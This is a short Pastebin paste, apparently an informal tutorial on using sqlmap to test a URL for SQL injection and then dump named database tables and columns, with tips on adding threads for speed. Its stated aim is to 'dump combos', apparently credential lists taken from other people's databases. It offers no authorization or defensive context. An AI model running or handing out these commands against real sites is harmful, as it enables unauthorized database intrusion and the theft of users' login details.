Advertisement
Guest User

Untitled

a guest
Sep 4th, 2021
426
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.45 KB | None | 0 0
  1. today i will show how to use sqlmap in kali linux
  2. or windows
  3. to dump combos in sqlmap we need to check url vulnerable or not
  4. kali linux (terminal): sqlmap -u"url"
  5. windows ( command prompt ): python sqlmap.py -u"url"
  6.  
  7. sqlmap -u "url" -D databasename -T tablename -C column1,column2 --dump --threads=10 --eta
  8. --eta for time
  9. u can also add threads now 1 running so its dumping in 150 mins or it dump in 10 min if i use 10 threads
  10. for threads --threads=10
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement